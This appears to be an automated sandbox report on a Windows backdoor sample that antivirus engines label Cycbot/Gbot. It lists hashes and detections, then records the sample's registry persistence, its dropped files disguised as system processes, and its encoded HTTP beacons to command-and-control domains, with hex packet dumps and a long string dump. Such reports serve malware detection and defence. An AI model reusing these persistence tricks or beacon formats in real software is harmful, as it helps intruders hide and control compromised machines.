Analysis Date2014-11-08 11:58:20
MD530e67f8b13815aedc475f793b0372ea5
SHA1e4227eec59494a887417b282655234c00174b184

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2748b17f3b34ddcdca3c070291636181 sha1: 64729c8bb2c1885a48108641735c4216882a8e16 size: 112640
Section.rdata md5: bde782900c351104a37ccfdc491a22ef sha1: 7a6cd04054351e1e2fd55eacf2ea5c7bd36da6a2 size: 1536
Section.data md5: 5e40f0d888cfa77da0fe70ca21ced124 sha1: 19ebd3305560fc1fcde0064b1313a3c03ae51e8f size: 74752
Section.reloc md5: 087782ae910a1949fe304894fbcd510b sha1: 5cd5c03f1358cd6c38a266a07783a50abb6d40a0 size: 1024
Timestamp2005-10-02 17:35:57
PEhashfd013d3439ef60ea47d9970f6e3d40784d1498f7
IMPhashc30c9dc7fac6e4dd11e400159fb9c51d
AV360 SafeGen:Variant.Kazy.38285
AVAd-AwareGen:Variant.Kazy.38285
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen8
AVBullGuardGen:Variant.Kazy.38285
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-471
AVDr. WebBackDoor.Gbot.71
AVEmsisoftGen:Variant.Kazy.38285
AVEset (nod32)Win32/Kryptik.SZU
AVFortinetW32/Jorik_Gbot.EBE!tr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureGen:Variant.Kazy.38285
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.oho
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.r
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.38285
AVNormanGen:Variant.Kazy.38285
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNSfreshmediaportal.com
Winsock DNSworldmotoblo.com
Winsock DNS127.0.0.1
Winsock DNShealthylifenow.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNShealthylifenow.com
Type: A
208.109.208.147
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSworldmotoblo.com
Type: A
DNSfreshmediaportal.com
Type: A
HTTP GEThttp://healthylifenow.com/templates/7349/images/header_logo.jpg?v89=10&tq=gHZutDyMv5rJejXia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 208.109.208.147:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f74656d 706c6174 65732f37   GET /templates/7
0x00000010 (00016)   3334392f 696d6167 65732f68 65616465   349/images/heade
0x00000020 (00032)   725f6c6f 676f2e6a 70673f76 38393d31   r_logo.jpg?v89=1
0x00000030 (00048)   30267471 3d67485a 75744479 4d763572   0&tq=gHZutDyMv5r
0x00000040 (00064)   4a656a58 6961396e 726d736c 36676957   JejXia9nrmsl6giW
0x00000050 (00080)   7a253242 4a5a6256 79412533 44204854   z%2BJZbVyA%3D HT
0x00000060 (00096)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000070 (00112)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000080 (00128)   20686561 6c746879 6c696665 6e6f772e    healthylifenow.
0x00000090 (00144)   636f6d0d 0a416363 6570743a 202a2f2a   com..Accept: */*
0x000000a0 (00160)   0d0a5573 65722d41 67656e74 3a206d6f   ..User-Agent: mo
0x000000b0 (00176)   7a696c6c 612f322e 300d0a0d 0a         zilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 79765571 25324633   OQij%2B8yvUq%2F3
0x000000c0 (00192)   766c6557 626b5925 33442048 5454502f   vleWbkY%3D HTTP/
0x000000d0 (00208)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000e0 (00224)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x000000f0 (00240)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000100 (00256)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000110 (00272)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000120 (00288)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 43695976 45615350   OQij%2B8CiYvEaSP
0x000000c0 (00192)   54253242 73717069 3852704c 36666853   T%2Bsqpi8RpL6fhS
0x000000d0 (00208)   72253246 65253242 56355a75 52672533   r%2Fe%2BV5ZuRg%3
0x000000e0 (00224)   44253344 20485454 502f312e 310d0a48   D%3D HTTP/1.1..H
0x000000f0 (00240)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000100 (00256)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000110 (00272)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000120 (00288)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000130 (00304)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 32755976 45615325   OQij%2B82uYvEaS%
0x000000c0 (00192)   32465425 32427371 68537225 32466525   2FT%2BsqhSr%2Fe%
0x000000d0 (00208)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000e0 (00224)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000f0 (00240)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x00000100 (00256)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000110 (00272)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000120 (00288)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000130 (00304)   6e3a2063 6c6f7365 0d0a0d0a 73650d0a   n: close....se..
0x00000140 (00320)   0d0a                                  ..


Strings
.
.
X.M
.
r
.
.
.
..W\@.
.
.x
080904b0
1.0.0.1
1852
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
`````````
`````````````
^^^^^^^^
^^^^++++++++++++
<<<<<<<<<<<<{{{{
=======
>>>>>>
>>>>>>>>>>
||||||
|||||||||||
|''''''''''''''''''''''''
 =$``$
              
               
__________
___________
------
--------
---------------
,,,,,,
,,,,,,,
,,,,,,,,
,,,,,,,,,,
,,,,++++(((
;  @,`
;;;;;;;;
;;;;;;;;;;
;;;;;;;]]]
!!!!!!!!!!!!!!!!!!!
!!!!!!!]
/////////
///////////
......
................
.............\\\\\\\\\\\\\\\\
""""""
""""""""
""""""""""""""""""	
)))))))
))))))))))))))
[[[---
[[[[[[[[[[[[[						&&&&&&&&
{{{{{{{
{{{{{{{{{{{{
{{{{{{{{{{******
}}}}}}}
@{{{{{
@@@@@@@
@@@@@@@@@@@
&&&&&&
&&&&&&&&&&
########
%%%%%%%
%%%%%%%%
							""""""
								
									
  0At.`
0C=6w<;^
0]mO( 
0|Sj*r;
0ved9%
_11aBT-
>1=\El
/1Fn0G
1GgOiO
1H!EB[
@`1^I>I
1]l"@ \
1%p&` 
1}v"fc
(1Zj_-
` )2*`
2>>>>>>+
222222222
22XXXXXCCCCC|||
2HuS&U
'~:2{LQu
2qi-'_
``33333
::::::::}}333333
33333333
|||||||!!!!!!!!!!!3333333333
33333333333333333333
33333333%%%%hhhhhhhh@@@
(3GAwr
3jpF>3Bc
@3Mpi|l?J
3N`SFQ
=3~oS/R
3P2f4(
3tx=U#
(`@463"
4e.` #
 4)+E$
4]KOt'
4^oGf'2}
4"<]OI
]4U\Vu
4z3o1$
55555555555555555555
57c#(@
5b}/Y9
'/!:5Ci
5_GP\<
5|nNP_
5^yyX	d
)))))))))666
.66666[[[
66666666''
`@6g;~
*6iD$AZYk
6q#;R+
6RIBn|
+6t0Ih
^^^^^^^^^^^^7777777
77777777777777777
7777777PPrrrrrrrqqq
7e)z'nx
7`l%?8
7Q&~hc
$?+)8[
82NEoU
888888
_ 888888888888888
888JJJJJJJ
8aAZ6	
8bh.i Jn
8E k9J
#8H6.[9
&8X#k8
\8xM:9
9[@2^>
999********
999\\\
9999999999999
99999MMMMMMMMMMMMAAAAAAAAAe
*****************a
a^8e4E|1
AAAAAA
aaaaaaaA
AAAAAAAAA
aaaaaaaaaaaaaa
ABli+$
aeG&`@4
AK=3Agbj%
a<OrPK
Aq@'3~]
`AR( @
;AtSSfy
a	xWP1!
aY @"R-'
a~<%Zc~
/b           
b=0DH>
b`5o* Gs
bAg_x]
bbb99999
BBBBBBB
b?(+:.~g^
BitBlt
)<bNgJ
|BQ!l0
bXB4#JQ$+hurK
BxmxT;&`
C`0zi\
c9*` PR
CbMr*p
ccccccc|||||||||
CCCCCCC
cccccccccc
CCCCCCCCCCCCCCCCCBBB
CCCCCJJJJJJ
C!{?h7
C|||||||||nn
cpmYb'
CreateCompatibleDC
CreateFileW
Cu7A/l
CV, `|
Cx1S3Z1&sA
*=)+D1(
d4[Z">
da3&`@
@.data
'^dB;2<
@@DBT2
ddddddd
DDDDDDDD44444444444
DDDDDDDDD
ddddddddddJJJJJJJJJEEEEE
DeleteCriticalSection
DeleteDC
/Dh75b
 Dhpfs[
dH}?<rQ
Di^N>$H
D K9EG}}
DnEFh'NAA
DuplicateHandle
e74SD)
E)`{8(
eBzC>x
EE2222222222P
EEEEEEEEEEEE
EEEEEEEEEEEEE
EEEEEEEEEEEEEE((((((((SSSS6
EEEEEEEEOO
EEElll
eO>/gp
:EPp}?H
EsBq|r
et+4i5
Euy-n)
eVKhJWVp
ExitProcess
EYCz$ 
ffffff
FFFFFFFFFFFFFF
fffffJ{{{
FI;876C>
FlushInstructionCache
f	nr%?
FormatMessageA
fpB|<%w
F{S{EK
& `FSo
{`fu&?8
%fV)#J[ @@
f_X=1[
@%;g`;
( `	G.
g2 ltM
@`g4NX9(
g""""aaaaaaaaaTTTT
GetCommandLineA
GetCurrentProcess
GetCurrentThreadId
GetDeviceCaps
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetLastError
GetObjectA
GetStartupInfoA
GetTempPathW
GetThreadContext
GetVersionExW
GetWindowsDirectoryW
((((((GG
ggg($$$$$$$
gggbbtttt
GGGG::::::
GGGGGGGGGGGGGGGGGGGGGGGGGrrrrrrr
GGGGGLLL
g^<)i2
#GISsGJP
GJ5X%9
Gj>~Yo
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
GO5e1k
g^p*  
`G/Po`
|=h,@@
_	),H#
H0j.N_hG=
`@HD4|
HeapAlloc
HeapFree
HE`P1J
 ~hfB5
HH(((((~
HH77777777
HHH~~~~~~
******hhhhhhhhhhhhhhhhh;
hhhhhiiiiiiiiiiiiiiiiiiiiii
&;h*HZV
}hXKI;
i}}}}}}}}
I8]t@NJ
"@@ICO
id72N" 
ifffRRR
@&I=GId
IIEEEE
IIIIIIII**********
iiiiiiiiiickkkkkkkkkkkkkwwwwwwwwwwwwwwwUUUU
iiiiiiiiiiiiii
iiiiiiiiiiiiiii
iiiiiiiiiiiiiiV??
iiiiiiiiooooo_____
ijc,@@c
:!i]m]Cs
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
  i_Ul80
="iY;Uo
Izbzuu
J|||||||||||
%%j57z
[J|/5h
J(Gt'/k
]]]]]JJJCCCC
JJJJJJJJJJJJJJJJJJJJ
jjjjjjjjjjjjjjjtt
jjj)))XXXX
JJmmmPPPP
)J;O3W
j=VwA2
  k$@@<
#*`` `@K	
K3s^x=
kc!}iF
KERNEL32.dll
KKFSSSSSSSSSS
KKKFFFFFFee
KKKKKK
kkkkkkk
KKKKKKK
kkkkkkkkkkk
KKKKKKKKKKKK
K:m)E]
k{*Z0}-
LCvY"5
@ LDCi
`Lggy1Q
 `lj%y
LL28888
LLcccWWWWWWWTTTTTTTTTTTTTTTTTTTTTllllll
>>>>>>>lllll
$$$$$$$$lllllTTTTTTTT
LocalFree
Lp;8d8
lq8{L-
lQovq`
\}LvF	
Lz#%RzM
>m.F_"
~M*_jc
_____________________mm
mmmmmAAAAAAA
mmmmmmmm{{{{{{{{
mmmmmmmmEEEEEEEEE
MMMMMMMMMMM
MMMmmmmmmmmmmm
MMMMMMMMMMMMMM
mmmmmmmmmmmmmmmmm
MtuBGW_
mwt4>a*
`>n3T.
NdrByteCountPointerFree
n<EuKN
[(:~nf
\nIL%" 
NNHHHHH
[[[[&&&&&&&&&&&&&&&NNNNN
NNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN<
*****NNNNNNNNNNVV
____NNNNNNNNqqqqqqqqqqqqqqqqqqq
??????NNN&&&wwwwww
N|~Pb\
ns@%1e
^NV(@`
nw)#<lm
n'X,` 
NX7D;2
Ny`n{|
ooo:::::
oooooo
::::::::::oooooo
<??**OOOOOO
OOOOOOOOO
}OOXCii
}OrK2Sy
o	snoP
oUpstZ
'.``]paF<	r
PBAgWm5w
`@pe>99
	pIj@W
P}j)lx
 @PM5'.`
PNNNNNN
ppp:::::::::
PPPPPP
ppppppp
pppppppaaaaaaa7779999999999
PPPTTTTTTTTT
+_{pu  
QDqP+G
q`pBdS
$$$;;;;;;;;;;;;qqqqqq
qqqqqqqq+++++
qqqqqqqqqq
qqqqqqqqqqq
qX<f&G!ZH
=qx]tI
;Qy2ji7
|-$`@\R,
R9yRh4
RaiseException
Rc+9ce
`.rdata
RealizePalette
.reloc
		rgk7
RPCRT4.dll
RpcStringFreeA
/%%%%%%RR""
rrrrrr
--rrrrrrrrr
RRRRRRRRR
]]]RRRRRRRRRR
rrrrrrWWWWWWWWWWW
RtlUnwind
R  `	@U
Rz-TI"T
+S55Sg
S,` B0
SelectObject
SelectPalette
SetLastError
SetLocaleInfoW
SetMapMode
s	G&`@
S'Gc&u
SG:[H@3
Sp#p3k
[s$RkH
SSSSSS
sssssss
ssssssssssNNN
SSSSSSSSSSSSSSSSS))))))))))))
StrDupA
StrDupW
StrFormatByteSizeEx
StrRChrA
StrRChrW
StrRetToBSTR
StrRetToBufW
StrRetToStrW
StrStrA
StrStrIA
StrStrIW
StrStrW
StrToInt64ExW
StrToIntA
StrToIntExW
StrToIntW
StrTrimW
` ?SV;2
sy:J1;U
`^-$``Sz
T/////////////////////////////------
T>90ej
\\TA`0
tCvePr-
T~-EJ\]
!This program cannot be run in DOS mode.
TlsSetValue
	tsVyV
TTTTTTTTTTT
TTTTTTTTTTTTTTT
TTTTTTTTTTTTTTTTTTT@@@@
 ` T-{W
twain_32.dll
^<T,X@
  `Ub`%
|uc7K$
=ue5Ws'*
UL~jbl
-uNJA3j
UnrealizeObject
UrlApplySchemeA
UrlApplySchemeW
UrlCanonicalizeA
UrlCanonicalizeW
UrlCombineA
UrlCombineW
UrlEscapeA
UrlEscapeW
UrlGetPartW
UrlUnescapeA
UrlUnescapeW
UuidCreate
UuidToStringA
[[[uuuu
$$UUUUU
uuuuuuuuuuuuuuuuuuuu
UwoZl)
U%YL0'2?>
V,|-<2
V=^3e$
}|	V4n
?V{7ao
 @V8w!
v9D=y	
vDbvNR
VerQueryValueA
VERSION.dll
v_)=HY0
VirtualProtectEx
\Vn+@u
vPoMY;h
vvv\\\\\\\\\????
VVVVVV++++++++++
vvvvvvtttt////////CCCCCCCCC
VVVVVVVVV
VVVVVVVVzzz
VW2'-U)
vwvnsprintfW
VZ((~#8
*  vzZC
W:?2Oh
WaitForSingleObject
)wCkB`
Wd~so"
WGwjY" 
wM[kdr8
wnsprintfA
wnsprintfW
WriteProcessMemory
WW{{{{
WWWWooooooo
wwwwwwwwwww
wwwwwwwwwwwww
>>>>>WWWWWWWWWWWWWWWWWW
WZ8_6s`
x/))]=
X^>))?
X#;  `	?
,  X0O
X2>(bf
xA&` [
xQ*Z"H
XS4^;-
XV[^ {
XXXXXXXXXXXXXXXXXXXXX
y3`3oH
Y6jXk+'wQ
YaDd|P4$
Ydhm83A
ye:VeV
$Y(HUnv
"yIW1Z
Ys[)*M
yVKqGgC
yy777777
=yyyyyy
yyyyyyyyy
`~z|$ 
@@z,` 
$@@);z
"!%_Z~
Z2@eO|
>#z2sdGG
 \Z8Nu
ZdO"  
``ZdVI
zj^E[}.
ZJJJJJJJJJJJJ}}}}
zr$a?v
`:ZW_s<%
<z$YkN
;;;;;;ZZ
ZZZZZZZZZZZZ